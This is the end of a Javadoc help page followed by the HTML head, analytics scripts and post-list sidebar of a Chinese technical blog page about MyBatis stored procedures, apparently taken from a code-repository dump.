<li>When viewing a particular package, class or interface page, clicking "Tree" displays the hierarchy
for only that package.
</li>
</ul>
</li>
<li class="blockList">
<h2>Deprecated API</h2>
<p>The <a href="deprecated-list.html">Deprecated API</a> page lists all of the API that have been
deprecated. A deprecated API is not recommended for use, generally due to improvements, and a
replacement API is usually given. Deprecated APIs may be removed in future implementations.</p>
</li>
<li class="blockList">
<h2>Index</h2>
<p>The <a href="index-files/index-1.html">Index</a> contains an alphabetic list of all classes, interfaces,
constructors, methods, and fields.</p>
</li>
<li class="blockList">
<h2>Prev/Next</h2>
<p>These links take you to the next or previous class, interface, package, or related page.</p>
</li>
<li class="blockList">
<h2>Frames/No Frames</h2>
<p>These links show and hide the HTML frames. All pages are available with or without frames.</p>
</li>
<li class="blockList">
<h2>All Classes</h2>
<p>The <a href="allclasses-noframe.html">All Classes</a> link shows all classes and interfaces except
non-static nested types.</p>
</li>
<li class="blockList">
<h2>Serialized Form</h2>
<p>Each serializable or externalizable class has a description of its serialization fields and methods. This
information is of interest to re-implementors, not to developers using the API. While there is no link
in the navigation bar, you can get to this information by going to any serialized class and clicking
"Serialized Form" in the "See also" section of the class description.</p>
</li>
<li class="blockList">
<h2>Constant Field Values</h2>
<p>The <a href="constant-values.html">Constant Field Values</a> page lists the static final
fields and their values.</p>
</li>
</ul>
<em>This help file applies to API documentation generated using the standard doclet.</em></div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="org/sfsoft/serializar/gui/package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li><a href="org/sfsoft/serializar/gui/package-tree.html">Tree</a></li>
<li><a href="deprecated-list.html">Deprecated</a></li>
<li><a href="index-files/index-1.html">Index</a></li>
<li class="navBarCell1Rev">Help</li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="index.html?help-doc.html" target="_top">Frames</a></li>
<li><a href="help-doc.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if (window == top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
2019/12/01/MyBatis/MyBatis 08-存储过程/index.html | CoolView/CoolView.github.io | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>MyBatis 08-存储过程 | Gradatim's blog</title>
<meta name="keywords" content=" Java , MyBatis ">
<meta name="description" content="MyBatis 08-存储过程 | Gradatim's blog">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="官方文档:https://docs.docker.com/ 简介Docker 属于 Linux 容器的一种封装,提供简单易用的容器使用接口。它是目前最流行的 Linux 容器解决方案。 Docker 将应用程序与该程序的依赖,打包在一个文件里面。运行这个文件,就会生成一个虚拟容器。程序在这个虚拟容器里运行,就好像在真实的物理机上运行一样。有了 Docker,就不用担心环境问题。 总体来说,Dock">
<meta name="keywords" content="Docker">
<meta property="og:type" content="article">
<meta property="og:title" content="Docker 简介与安装">
<meta property="og:url" content="http://coolview.github.io/2020/05/02/Docker%20%E7%AE%80%E4%BB%8B%E4%B8%8E%E5%AE%89%E8%A3%85/index.html">
<meta property="og:site_name" content="Gradatim's blog">
<meta property="og:description" content="官方文档:https://docs.docker.com/ 简介Docker 属于 Linux 容器的一种封装,提供简单易用的容器使用接口。它是目前最流行的 Linux 容器解决方案。 Docker 将应用程序与该程序的依赖,打包在一个文件里面。运行这个文件,就会生成一个虚拟容器。程序在这个虚拟容器里运行,就好像在真实的物理机上运行一样。有了 Docker,就不用担心环境问题。 总体来说,Dock">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://blog-1252208501.cos.ap-beijing.myqcloud.com/2020504155527.png">
<meta property="og:image" content="https://blog-1252208501.cos.ap-beijing.myqcloud.com/docker-architecture.svg">
<meta property="og:updated_time" content="2020-08-13T15:06:13.310Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog-1252208501.cos.ap-beijing.myqcloud.com/2020504155527.png">
<link rel="icon" href="/img/1460UaK0Z-15930.jpg">
<link href="/css/style.css?v=1.0.1" rel="stylesheet">
<link href="/css/hl_theme/atom-light.css?v=1.0.1" rel="stylesheet">
<link href="//cdn.bootcss.com/animate.css/3.5.2/animate.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/photoswipe/4.1.2/photoswipe.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/photoswipe/4.1.2/default-skin/default-skin.min.css" rel="stylesheet">
<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js?v=1.0.1" ></script>
<script src="//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js"></script>
<script>
hljs.initHighlightingOnLoad();
</script>
<script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>
<script id="dsq-count-scr" src="//coolview.disqus.com/count.js" async></script>
<script src="/js/iconfont.js?v=1.0.1" ></script>
<script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?939ec0c46b2e18a32c44c37e5b49dc2d";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-78433617-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-78433617-1');
</script>
<script data-ad-client="ca-pub-7969663237915266" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<link rel="alternate" href="/atom.xml" title="Gradatim's blog" type="application/atom+xml">
</head>
<div style="display: none">
<input class="theme_disqus_on" value="true">
<input class="theme_preload_comment" value="false">
<input class="theme_blog_path" value="">
</div>
<body>
<aside class="nav">
<div class="nav-left">
<a href="/" class="avatar_target">
<img class="avatar" src="/img/1460UaK0Z-15930.jpg" />
</a>
<div class="author">
<span>Bin</span>
</div>
<div class="icon">
<a title="rss" href="/atom.xml" target="_blank">
<svg class="iconfont-svg" aria-hidden="true">
<use xlink:href="#icon-rss"></use>
</svg>
</a>
<a title="github" href="https://github.com/CoolView" target="_blank">
<svg class="iconfont-svg" aria-hidden="true">
<use xlink:href="#icon-github"></use>
</svg>
</a>
<a title="email" href="mailto:bin07280@qq.com" target="_blank">
<svg class="iconfont-svg" aria-hidden="true">
<use xlink:href="#icon-email"></use>
</svg>
</a>
</div>
<ul>
<li><div class="all active">全部文章<small>(261)</small></div></li>
<li><div data-rel="工具">工具<small>(11)</small></div>
</li>
<li><div data-rel="Python">Python<small>(51)</small></div>
</li>
<li><div data-rel="Java">Java<small>(110)</small></div>
</li>
<li><div data-rel="Linux">Linux<small>(4)</small></div>
</li>
<li><div data-rel="数据库">数据库<small>(9)</small></div>
</li>
<li><div data-rel="Docker">Docker<small>(1)</small></div>
</li>
<li><div data-rel="Android">Android<small>(11)</small></div>
</li>
<li><div data-rel="设计模式">设计模式<small>(25)</small></div>
</li>
<li><div data-rel="前端">前端<small>(15)</small></div>
</li>
<li><div data-rel="MongoDB">MongoDB<small>(16)</small></div>
</li>
<li><div data-rel="数据结构">数据结构<small>(8)</small></div>
</li>
</ul>
<div class="left-bottom">
<div class="menus">
</div>
<div></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="261">
<input type="hidden" id="yelog_site_word_count" value="408.3k">
<div style="display: none">
<span id="busuanzi_value_site_uv"></span>
<span id="busuanzi_value_site_pv"></span>
</div>
</div>
<div class="nav-right">
<div class="friends-area">
<div class="friends-title">
友情链接
<i class="back-title-list"></i>
</div>
<div class="friends-content">
<ul>
<li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
</ul>
</div>
</div>
<div class="title-list">
<form onkeydown="if(event.keyCode==13){return false;}">
<input class="search" type="text" placeholder="以 in: 开头进行全文搜索" autocomplete="off"id="local-search-input" >
<i class="cross"></i>
<span>
<label for="tagswitch">Tags:</label>
<input id="tagswitch" type="checkbox" style="display: none" />
<i id="tagsWitchIcon"></i>
</span>
</form>
<div class="tags-list">
<li class="article-tag-list-item">
<a class="color4">IntelliJ</a>
</li>
<li class="article-tag-list-item">
<a class="color5">MQTT</a>
</li>
<li class="article-tag-list-item">
<a class="color2">Python</a>
</li>
<li class="article-tag-list-item">
<a class="color3">技巧</a>
</li>
<li class="article-tag-list-item">
<a class="color3">Windows</a>
</li>
<li class="article-tag-list-item">
<a class="color3">编码</a>
</li>
<li class="article-tag-list-item">
<a class="color5">Java</a>
</li>
<li class="article-tag-list-item">
<a class="color1">Nginx</a>
</li>
<li class="article-tag-list-item">
<a class="color2">VSCode</a>
</li>
<li class="article-tag-list-item">
<a class="color4">dos</a>
</li>
<li class="article-tag-list-item">
<a class="color3">sublime</a>
</li>
<li class="article-tag-list-item">
<a class="color1">redis</a>
</li>
<li class="article-tag-list-item">
<a class="color2">Docker</a>
</li>
<li class="article-tag-list-item">
<a class="color4">Git</a>
</li>
<li class="article-tag-list-item">
<a class="color5">Hexo</a>
</li>
<li class="article-tag-list-item">
<a class="color4">支付宝</a>
</li>
<li class="article-tag-list-item">
<a class="color3">Android</a>
</li>
<li class="article-tag-list-item">
<a class="color1">第一行代码</a>
</li>
<li class="article-tag-list-item">
<a class="color5">Effective Java</a>
</li>
<li class="article-tag-list-item">
<a class="color5">设计模式</a>
</li>
<li class="article-tag-list-item">
<a class="color1">JUnit</a>
</li>
<li class="article-tag-list-item">
<a class="color2">Tomcat</a>
</li>
<li class="article-tag-list-item">
<a class="color1">log4j</a>
</li>
<li class="article-tag-list-item">
<a class="color1">JavaScript</a>
</li>
<li class="article-tag-list-item">
<a class="color2">jQuery</a>
</li>
<li class="article-tag-list-item">
<a class="color4">Java编程思想</a>
</li>
<li class="article-tag-list-item">
<a class="color5">html</a>
</li>
<li class="article-tag-list-item">
<a class="color3">MongoDB</a>
</li>
<li class="article-tag-list-item">
<a class="color1">Linux</a>
</li>
<li class="article-tag-list-item">
<a class="color3">MyBatis</a>
</li>
<li class="article-tag-list-item">
<a class="color3">Mybatis</a>
</li>
<li class="article-tag-list-item">
<a class="color1">MySQL</a>
</li>
<li class="article-tag-list-item">
<a class="color4">SQL</a>
</li>
<li class="article-tag-list-item">
<a class="color2">Spring</a>
</li>
<li class="article-tag-list-item">
<a class="color5">数据结构</a>
</li>
<li class="article-tag-list-item">
<a class="color2">大话数据结构</a>
</li>
<li class="article-tag-list-item">
<a class="color1">Shiro</a>
</li>
<li class="article-tag-list-item">
<a class="color2">Quartz</a>
</li>
<div class="clearfix"></div>
</div>
<div id="local-search-result">
</div>
<nav id="title-list-nav">
<a class="数据库 "
href="/2020/08/13/MySQL/MySQL%20%E4%BA%8B%E4%BB%B6/"
data-tag="MySQL"
data-author="" >
<span class="post-title" title="MySQL 事件">MySQL 事件</span>
<span class="post-date" title="2020-08-13 23:04:29">2020/08/13</span>
</a>
<a class="Docker "
href="/2020/05/02/Docker%20%E7%AE%80%E4%BB%8B%E4%B8%8E%E5%AE%89%E8%A3%85/"
data-tag="Docker"
data-author="" >
<span class="post-title" title="Docker 简介与安装">Docker 简介与安装</span>
<span class="post-date" title="2020-05-02 21:06:22">2020/05/02</span>
</a>
<a class="Java "
href="/2019/12/01/MyBatis/MyBatis%2010-%E7%BC%93%E5%AD%98%E9%85%8D%E7%BD%AE/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis 10-缓存配置">MyBatis 10-缓存配置</span>
<span class="post-date" title="2019-12-01 15:53:26">2019/12/01</span>
</a>
<a class="Java "
href="/2019/12/01/MyBatis/MyBatis%2009-%E4%BD%BF%E7%94%A8%E6%9E%9A%E4%B8%BE%E6%88%96%E5%85%B6%E4%BB%96%E5%AF%B9%E8%B1%A1/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis 09-使用枚举或其他对象">MyBatis 09-使用枚举或其他对象</span>
<span class="post-date" title="2019-12-01 14:33:25">2019/12/01</span>
</a>
<a class="Java "
href="/2019/12/01/MyBatis/MyBatis%2008-%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis 08-存储过程">MyBatis 08-存储过程</span>
<span class="post-date" title="2019-12-01 13:54:52">2019/12/01</span>
</a>
<a class="Java "
href="/2019/11/30/Java/Java%20%E5%BC%80%E5%8F%91%E6%89%8B%E5%86%8C/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="《Java 开发手册》记录">《Java 开发手册》记录</span>
<span class="post-date" title="2019-11-30 16:55:52">2019/11/30</span>
</a>
<a class="Java "
href="/2019/11/17/MyBatis/MyBatis%2007-%E9%AB%98%E7%BA%A7%E6%9F%A5%E8%AF%A2/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis 07-高级查询">MyBatis 07-高级查询</span>
<span class="post-date" title="2019-11-17 21:04:43">2019/11/17</span>
</a>
<a class="Java "
href="/2019/11/17/MyBatis/MyBatis%2006-%E4%BB%A3%E7%A0%81%E7%94%9F%E6%88%90%E5%99%A8/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis 06-代码生成器">MyBatis 06-代码生成器</span>
<span class="post-date" title="2019-11-17 15:11:16">2019/11/17</span>
</a>
<a class="Python "
href="/2019/10/11/Python/aiohttp%20%E7%AE%80%E5%8D%95%E8%AE%B0%E5%BD%95/"
data-tag="Python"
data-author="" >
<span class="post-title" title="aiohttp 简单记录">aiohttp 简单记录</span>
<span class="post-date" title="2019-10-11 17:05:03">2019/10/11</span>
</a>
<a class="Linux "
href="/2019/10/11/Nginx%20%E8%AE%B0%E5%BD%95/"
data-tag="Nginx"
data-author="" >
<span class="post-title" title="Nginx 记录">Nginx 记录</span>
<span class="post-date" title="2019-10-11 15:46:01">2019/10/11</span>
</a>
<a class="Java "
href="/2019/10/09/MyBatis/MyBatis%2005-%E5%8A%A8%E6%80%81%20SQL/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis 05-动态 SQL">MyBatis 05-动态 SQL</span>
<span class="post-date" title="2019-10-09 21:19:25">2019/10/09</span>
</a>
<a class="Java "
href="/2019/09/21/MyBatis/MyBatis%2004-%E6%B3%A8%E8%A7%A3%E6%96%B9%E5%BC%8F%E7%9A%84%E5%9F%BA%E6%9C%AC%E7%94%A8%E6%B3%95/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis 04-注解方式的基本用法">MyBatis 04-注解方式的基本用法</span>
<span class="post-date" title="2019-09-21 17:04:10">2019/09/21</span>
</a>
<a class="Java "
href="/2019/09/21/MyBatis/MyBatis%2003-XML%20%E6%98%A0%E5%B0%84%E6%96%87%E4%BB%B6/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis 03-XML 映射文件">MyBatis 03-XML 映射文件</span>
<span class="post-date" title="2019-09-21 14:32:21">2019/09/21</span>
</a>
<a class="Java "
href="/2019/09/18/MyBatis/MyBatis%2001-%E5%85%A5%E9%97%A8/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis 01-入门">MyBatis 01-入门</span>
<span class="post-date" title="2019-09-18 23:08:44">2019/09/18</span>
</a>
<a class="Java "
href="/2019/09/18/MyBatis/MyBatis%2002-XML%20%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis 02-XML 配置文件">MyBatis 02-XML 配置文件</span>
<span class="post-date" title="2019-09-18 23:08:44">2019/09/18</span>
</a>
<a class="Java "
href="/2019/08/26/Java/Maven%20%E5%AD%A6%E4%B9%A0/"
data-tag="Java"
data-author="" >
<span class="post-title" title="Maven 学习">Maven 学习</span>
<span class="post-date" title="2019-08-26 21:41:45">2019/08/26</span>
</a>
<a class="Java "
href="/2019/08/10/Spring/%E3%80%8ASpring%20%E5%AE%9E%E6%88%98%E3%80%8B%E7%AC%94%E8%AE%B07%EF%BC%9ASpring%20MVC%20%E7%9A%84%E9%AB%98%E7%BA%A7%E6%8A%80%E6%9C%AF/"
data-tag="Spring"
data-author="" >
<span class="post-title" title="《Spring 实战》笔记7:Spring MVC 的高级技术">《Spring 实战》笔记7:Spring MVC 的高级技术</span>
<span class="post-date" title="2019-08-10 09:37:27">2019/08/10</span>
</a>
<a class="Java "
href="/2019/08/06/Spring/%E3%80%8ASpring%20%E5%AE%9E%E6%88%98%E3%80%8B%E7%AC%94%E8%AE%B06%EF%BC%9A%E6%B8%B2%E6%9F%93%20Web%20%E8%A7%86%E5%9B%BE/"
data-tag="Spring"
data-author="" >
<span class="post-title" title="《Spring 实战》笔记6:渲染 Web 视图">《Spring 实战》笔记6:渲染 Web 视图</span>
<span class="post-date" title="2019-08-06 20:31:36">2019/08/06</span>
</a>
<a class="Java "
href="/2019/07/13/Spring/%E3%80%8ASpring%20%E5%AE%9E%E6%88%98%E3%80%8B%E7%AC%94%E8%AE%B05%EF%BC%9A%E6%9E%84%E5%BB%BA%20Spring%20Web%20%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F/"
data-tag="Spring"
data-author="" >
<span class="post-title" title="《Spring 实战》笔记5:构建 Spring Web 应用程序">《Spring 实战》笔记5:构建 Spring Web 应用程序</span>
<span class="post-date" title="2019-07-13 16:35:24">2019/07/13</span>
</a>
<a class="Java "
href="/2019/07/04/Spring/%E3%80%8ASpring%20%E5%AE%9E%E6%88%98%E3%80%8B%E7%AC%94%E8%AE%B04%EF%BC%9A%E9%9D%A2%E5%90%91%E5%88%87%E9%9D%A2%E7%9A%84%20Spring/"
data-tag="Spring"
data-author="" >
<span class="post-title" title="《Spring 实战》笔记4:面向切面的 Spring">《Spring 实战》笔记4:面向切面的 Spring</span>
<span class="post-date" title="2019-07-04 20:09:37">2019/07/04</span>
</a>
<a class="Java "
href="/2019/07/02/Spring/%E3%80%8ASpring%20%E5%AE%9E%E6%88%98%E3%80%8B%E7%AC%94%E8%AE%B03%EF%BC%9A%E9%AB%98%E7%BA%A7%E8%A3%85%E9%85%8D2/"
data-tag="Spring"
data-author="" >
<span class="post-title" title="《Spring 实战》笔记3:高级装配2">《Spring 实战》笔记3:高级装配2</span>
<span class="post-date" title="2019-07-02 22:13:00">2019/07/02</span>
</a>
<a class="Java "
href="/2019/06/20/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B057-65%EF%BC%9A%E5%BC%82%E5%B8%B8/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记57-65:异常">《Effective Java》笔记57-65:异常</span>
<span class="post-date" title="2019-06-20 22:06:00">2019/06/20</span>
</a>
<a class="Java "
href="/2019/06/19/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B045-56%EF%BC%9A%E9%80%9A%E7%94%A8%E7%A8%8B%E5%BA%8F%E8%AE%BE%E8%AE%A1/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记45-56:通用程序设计">《Effective Java》笔记45-56:通用程序设计</span>
<span class="post-date" title="2019-06-19 21:15:22">2019/06/19</span>
</a>
<a class="Java "
href="/2019/06/17/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B009%EF%BC%9A%E4%BD%BF%E7%94%A8%20try-with-resources%20%E8%AF%AD%E5%8F%A5%E6%9B%BF%E4%BB%A3%20try-finally%20%E8%AF%AD%E5%8F%A5/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记09:使用 try-with-resources 语句替代 try-finally 语句">《Effective Java》笔记09:使用 try-with-resources 语句替代 try-finally 语句</span>
<span class="post-date" title="2019-06-17 14:39:14">2019/06/17</span>
</a>
<a class="Java "
href="/2019/06/16/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B038-44%EF%BC%9A%E6%96%B9%E6%B3%95/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记38-44:方法">《Effective Java》笔记38-44:方法</span>
<span class="post-date" title="2019-06-16 18:57:28">2019/06/16</span>
</a>
<a class="Java "
href="/2019/06/16/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B035-37%EF%BC%9A%E6%B3%A8%E8%A7%A3/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记35-37:注解">《Effective Java》笔记35-37:注解</span>
<span class="post-date" title="2019-06-16 15:47:16">2019/06/16</span>
</a>
<a class="Java "
href="/2019/06/14/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B005%EF%BC%9A%E4%BE%9D%E8%B5%96%E6%B3%A8%E5%85%A5%E4%BC%98%E4%BA%8E%E7%A1%AC%E8%BF%9E%E6%8E%A5%E8%B5%84%E6%BA%90(hardwiring%20resources)/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记05:依赖注入优于硬连接资源(hardwiring resources)">《Effective Java》笔记05:依赖注入优于硬连接资源(hardwiring resources)</span>
<span class="post-date" title="2019-06-14 15:20:06">2019/06/14</span>
</a>
<a class="Java "
href="/2019/06/12/Java/Tomcat%20%E9%97%AE%E9%A2%98%E8%AE%B0%E5%BD%95/"
data-tag="Tomcat"
data-author="" >
<span class="post-title" title="Tomcat 问题记录">Tomcat 问题记录</span>
<span class="post-date" title="2019-06-12 15:41:06">2019/06/12</span>
</a>
<a class="Java "
href="/2019/06/12/Java/Tomcat%20%E4%BC%9A%E8%AF%9D%E6%8C%81%E4%B9%85%E5%8C%96%E9%85%8D%E7%BD%AE/"
data-tag="Tomcat"
data-author="" >
<span class="post-title" title="Tomcat 会话持久化配置">Tomcat 会话持久化配置</span>
<span class="post-date" title="2019-06-12 14:51:25">2019/06/12</span>
</a>
<a class="Java "
href="/2019/06/11/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B030-34%EF%BC%9A%E6%9E%9A%E4%B8%BE/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记30-34:枚举">《Effective Java》笔记30-34:枚举</span>
<span class="post-date" title="2019-06-11 22:50:03">2019/06/11</span>
</a>
<a class="Java "
href="/2019/05/29/MyBatis/MyBatis%20MySQL%20Druid%20%E6%89%B9%E9%87%8F%E6%9B%B4%E6%96%B0/"
data-tag="Java,MyBatis"
data-author="" >
<span class="post-title" title="MyBatis MySQL Druid 批量更新">MyBatis MySQL Druid 批量更新</span>
<span class="post-date" title="2019-05-29 10:38:01">2019/05/29</span>
</a>
<a class="MongoDB "
href="/2019/05/28/MongoDB/MongoDB%20%E7%94%A8%E6%88%B7%E3%80%81%E8%A7%92%E8%89%B2%E5%92%8C%E8%AE%A4%E8%AF%81/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB 用户、角色和认证">MongoDB 用户、角色和认证</span>
<span class="post-date" title="2019-05-28 13:56:42">2019/05/28</span>
</a>
<a class="MongoDB "
href="/2019/05/28/MongoDB/MongoDB%20%20%E5%AF%BC%E5%87%BA%E6%9F%A5%E8%AF%A2%E7%BB%93%E6%9E%9C/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB 导出查询结果">MongoDB 导出查询结果</span>
<span class="post-date" title="2019-05-28 11:20:21">2019/05/28</span>
</a>
<a class="Java "
href="/2019/05/27/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B023-29%EF%BC%9A%E6%B3%9B%E5%9E%8B/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记23-29:泛型">《Effective Java》笔记23-29:泛型</span>
<span class="post-date" title="2019-05-27 20:26:41">2019/05/27</span>
</a>
<a class="Python "
href="/2019/05/27/Python/Python%20%E8%BD%AC%E6%8D%A2%E6%96%87%E4%BB%B6%E7%BC%96%E7%A0%81%E6%A0%BC%E5%BC%8F/"
data-tag="Python"
data-author="" >
<span class="post-title" title="Python 转换文件编码格式">Python 转换文件编码格式</span>
<span class="post-date" title="2019-05-27 17:14:17">2019/05/27</span>
</a>
<a class="Java "
href="/2019/04/24/Spring/%E3%80%8ASpring%20%E5%AE%9E%E6%88%98%E3%80%8B%E7%AC%94%E8%AE%B03%EF%BC%9A%E9%AB%98%E7%BA%A7%E8%A3%85%E9%85%8D1/"
data-tag="Spring"
data-author="" >
<span class="post-title" title="《Spring 实战》笔记3:高级装配1">《Spring 实战》笔记3:高级装配1</span>
<span class="post-date" title="2019-04-24 21:14:22">2019/04/24</span>
</a>
<a class="Java "
href="/2019/04/20/Spring/%E3%80%8ASpring%20%E5%AE%9E%E6%88%98%E3%80%8B%E7%AC%94%E8%AE%B02%EF%BC%9A%E8%A3%9D%E9%85%8D%20Bean/"
data-tag="Java,Spring"
data-author="" >
<span class="post-title" title="《Spring 实战》笔记2:裝配 Bean">《Spring 实战》笔记2:裝配 Bean</span>
<span class="post-date" title="2019-04-20 21:14:22">2019/04/20</span>
</a>
<a class="Java "
href="/2019/04/13/Spring/%E3%80%8ASpring%20%E5%AE%9E%E6%88%98%E3%80%8B%E7%AC%94%E8%AE%B01%EF%BC%9ASpring%20%E4%B9%8B%E6%97%85/"
data-tag="Java,Spring"
data-author="" >
<span class="post-title" title="《Spring 实战》笔记1:Spring 之旅">《Spring 实战》笔记1:Spring 之旅</span>
<span class="post-date" title="2019-04-13 21:14:22">2019/04/13</span>
</a>
<a class="Java "
href="/2019/03/13/Java8/Java%208%E6%96%B0%E7%89%B9%E6%80%A7(10)%20StringJoiner/"
data-tag="Java"
data-author="" >
<span class="post-title" title="Java 8新特性(10) StringJoiner">Java 8新特性(10) StringJoiner</span>
<span class="post-date" title="2019-03-13 21:29:22">2019/03/13</span>
</a>
<a class="Java "
href="/2019/03/13/Java8/Java%208%E6%96%B0%E7%89%B9%E6%80%A7(9)%20%E9%87%8D%E5%A4%8D%E6%B3%A8%E8%A7%A3/"
data-tag="Java"
data-author="" >
<span class="post-title" title="Java 8新特性(9) 重复注解">Java 8新特性(9) 重复注解</span>
<span class="post-date" title="2019-03-13 21:19:22">2019/03/13</span>
</a>
<a class="Java "
href="/2019/03/13/Java8/Java%208%E6%96%B0%E7%89%B9%E6%80%A7(8)%20Base64/"
data-tag="Java"
data-author="" >
<span class="post-title" title="Java 8新特性(8) Base64">Java 8新特性(8) Base64</span>
<span class="post-date" title="2019-03-13 21:18:22">2019/03/13</span>
</a>
<a class="Java "
href="/2019/03/13/Java8/Java%208%E6%96%B0%E7%89%B9%E6%80%A7(7)%20%E6%97%B6%E9%97%B4%E6%97%A5%E6%9C%9FAPI/"
data-tag="Java"
data-author="" >
<span class="post-title" title="Java 8新特性(7) 时间日期API">Java 8新特性(7) 时间日期API</span>
<span class="post-date" title="2019-03-13 21:17:22">2019/03/13</span>
</a>
<a class="Java "
href="/2019/03/13/Java8/Java%208%E6%96%B0%E7%89%B9%E6%80%A7(6)%20Map%20%E6%96%B0%E5%A2%9E%E6%96%B9%E6%B3%95/"
data-tag="Java"
data-author="" >
<span class="post-title" title="Java 8新特性(6) Map 新增方法">Java 8新特性(6) Map 新增方法</span>
<span class="post-date" title="2019-03-13 21:16:22">2019/03/13</span>
</a>
<a class="Java "
href="/2019/03/13/Java8/Java%208%E6%96%B0%E7%89%B9%E6%80%A7(5)%20Parallel%20Streams/"
data-tag="Java"
data-author="" >
<span class="post-title" title="Java 8新特性(5) Parallel Streams">Java 8新特性(5) Parallel Streams</span>
<span class="post-date" title="2019-03-13 21:15:22">2019/03/13</span>
</a>
<a class="Java "
href="/2019/03/13/Java8/Java%208%E6%96%B0%E7%89%B9%E6%80%A7(4)%20Stream/"
data-tag="Java"
data-author="" >
<span class="post-title" title="Java 8新特性(4) Stream">Java 8新特性(4) Stream</span>
<span class="post-date" title="2019-03-13 21:14:22">2019/03/13</span>
</a>
<a class="Java "
href="/2019/03/13/Java8/Java%208%E6%96%B0%E7%89%B9%E6%80%A7(3)%20%E5%86%85%E7%BD%AE%E5%87%BD%E6%95%B0%E5%BC%8F%E6%8E%A5%E5%8F%A3/"
data-tag="Java"
data-author="" >
<span class="post-title" title="Java 8新特性(3) 内置函数式接口">Java 8新特性(3) 内置函数式接口</span>
<span class="post-date" title="2019-03-13 21:08:22">2019/03/13</span>
</a>
<a class="Java "
href="/2019/03/13/Java8/Java%208%E6%96%B0%E7%89%B9%E6%80%A7(2)%20Lambda%20%E8%A1%A8%E8%BE%BE%E5%BC%8F/"
data-tag="Java"
data-author="" >
<span class="post-title" title="Java 8新特性(2) Lambda 表达式">Java 8新特性(2) Lambda 表达式</span>
<span class="post-date" title="2019-03-13 21:07:22">2019/03/13</span>
</a>
<a class="Java "
